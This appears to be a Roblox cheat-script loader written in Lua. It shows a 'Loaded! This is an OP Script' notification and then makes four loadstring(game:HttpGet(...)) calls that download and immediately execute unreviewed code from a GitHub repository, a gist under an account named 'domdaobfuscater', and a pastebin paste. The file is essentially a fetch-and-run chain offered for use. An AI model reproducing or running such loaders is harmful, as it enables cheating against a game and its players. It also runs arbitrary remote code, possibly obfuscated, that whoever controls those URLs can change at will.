local notifLib = loadstring(game:HttpGet("https://raw.githubusercontent.com/Sw1ndlerScripts/RobloxScripts/main/Notification%20Library/main.lua"))()

notifLib:CreateDefaultNotif({
  TweenSpeed = 1,
  Title = "Loaded!",
  Text = "This is an OP Script",
  Duration = 5
})



loadstring(game:HttpGet("https://gist.githubusercontent.com/domdaobfuscater/09214a11b8a30bab47ceff281116195f/raw/40356a0ff4542a51283ab5de0a642233a6ceb6f9/gistfile1.txt"))()

loadstring(game:HttpGet("https://raw.githubusercontent.com/Vcsk/DerpX/main/main.lua", true))()

loadstring(game:HttpGet('https://pastebin.com/raw/WrVDdcLT'))()
